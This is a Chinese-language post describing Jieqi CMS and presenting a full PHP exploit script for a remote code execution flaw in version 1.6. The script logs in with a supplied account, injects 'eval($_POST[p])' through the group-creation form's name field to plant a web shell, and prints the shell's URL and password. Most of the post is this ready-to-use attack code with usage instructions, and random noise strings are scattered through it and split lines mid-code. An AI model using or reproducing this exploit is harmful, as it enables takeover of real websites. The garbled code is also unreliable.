杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
利用前提:需要有一个能创建圈子的用户。
& z- s: Q9 g* Y3 ^7 m<?php1 J8 ` M* ]2 y3 X2 D
" U. G6 Z. ~4 A) }6 c) w5 [print_r('. F" J8 o- {: h9 r( k1 q
+---------------------------------------------------------------------------+
# y% E; v5 t+ q1 DJieqi CMS V1.6 PHP Code Injection Exploit" _1 S$ j) N8 h+ y# m
by flyh4t6 H3 Y5 m4 w9 U) N0 i
mail: phpsec at hotmail dot com( f: i, Y. \: p8 }" m1 Z$ }
team: http://www.wolvez.org, h# T+ U. L8 [& C X
+---------------------------------------------------------------------------+8 j6 U, U6 w! v' g
'); /**4 {' J( s' Z- m+ ^6 `5 t1 j# B
* works regardless of php.ini settings
. I) i1 i& b7 P$ @; h- ]+ O*/ if ($argc < 5) { print_r('
# K) w% g$ l0 b+ S9 n0 G+---------------------------------------------------------------------------+
: q1 o$ t8 [5 aUsage: php '.$argv[0].' host path username
. @" Q( m, t8 ^9 m2 ?* khost: target server (ip/hostname)$ x5 j0 q; a7 ?& E1 `
path: path to jieqicms 5 S: F. p9 ]$ `2 G. z- J
uasename: a username who can create group C8 z: E. ~5 ~& [; f* d, Y
Example:
( [2 L) K, ]: t0 u$ [9 H# Nphp '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password
4 |0 ^+ P& Y# _+---------------------------------------------------------------------------+
: I, |# X" p ~$ v/ \6 t/ |' g. k7 c# K'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------232811682799612 y5 g* h! Z7 k( W8 \4 t
Content-Disposition: form-data; name="gname". I' {8 X0 K; F$ M" S
3 p, P: f4 ] U) L: O$ O+ N5 h
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
3 h: N$ Y. ]7 J4 f7 O" H. d-----------------------------23281168279961" u \* k0 {( V, X
Content-Disposition: form-data; name="gcatid"' j5 R+ g) S. S1 h R1 x8 p
0 s4 b% ^( a5 {6 x/ }0 A% ~1+ _) b3 }4 f }/ t4 Z
-----------------------------23281168279961
) G3 q2 C" W$ Q% c* V' }Content-Disposition: form-data; name="gaudit"0 j q: X/ V1 D- @! @+ `
4 n% X+ E: e" Q0 w
1+ \3 i t: Q" a' b) }% E
-----------------------------23281168279961' y2 ]7 g% F1 e% Z; X. E$ b
Content-Disposition: form-data; name="gbrief"7 {4 o# u5 h; }" ~* V3 C c
' X* J0 `! z) x3 P o
1
: }, ^% s& V/ K' ?/ C-----------------------------23281168279961--2 U! g3 B( V6 m9 M
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
2 u8 b a" ~! G% }; b" V
5 m1 l9 K; U" hpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |